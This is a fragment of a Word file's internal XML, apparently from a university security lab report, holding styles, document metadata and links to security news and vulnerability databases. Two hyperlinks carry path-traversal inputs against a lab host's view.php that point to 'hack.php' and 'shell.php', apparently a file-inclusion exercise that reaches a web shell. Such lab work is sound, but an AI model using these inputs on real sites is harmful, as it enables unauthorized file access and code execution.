      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="es-CO"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="008140B8"/>
    <w:pPr>
      <w:keepLines/>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:color w:val="2F5496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140B8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008140B8"/>
    <w:pPr>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00960C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C9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60C98"/>
    <w:rPr>
      <w:lang w:val="es-CO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C9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60C98"/>
    <w:rPr>
      <w:b/>
      <w:bCs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02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vd.nist.gov/vuln/search" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.microsoft.com/office/2016/09/relationships/commentsIds" Target="commentsIds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yperlink" Target="http://192.168.56.101/view.php?page=../../usr/databases/hack.php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vuldb.com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yperlink" Target="http://192.168.56.101/view.php?page=../../usr/databases/shell.php" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId35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D152DF-E714-4A8B-917C-EC122DACE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3</TotalTime>
  <Pages>13</Pages>
  <Words>988</Words>
  <Characters>563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1</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="48" baseType="variant">
      <vt:variant>
        <vt:i4>6094970</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>18</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>mailto:carlos.villalba@escuelaing.edu.co</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>327762</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>15</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.bloomberg.com/topics/cybersecurity</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>917530</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>12</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.telegraph.co.uk/technology/internet-security/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>5177368</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>9</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.theguardian.com/media-network/information-security</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6684728</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>6</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>http://www.bbc.com/news/technology</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>196692</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>3</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://cyberstreetwise.com/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>1703939</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>https://technet.microsoft.com/security/bulletin/</vt:lpwstr>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr/>
      </vt:variant>
      <vt:variant>
        <vt:i4>6094970</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>0</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:i4>5</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpwstr>mailto:carlos.villalba@escuelaing.edu.c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80230676</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>DANIEL ORLANDO DIAZ LOPEZ</cp:lastModifiedBy>
  <cp:revision>31</cp:revision>
  <cp:lastPrinted>2014-09-19T20:04:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-01-25T18:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-08-24T11:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>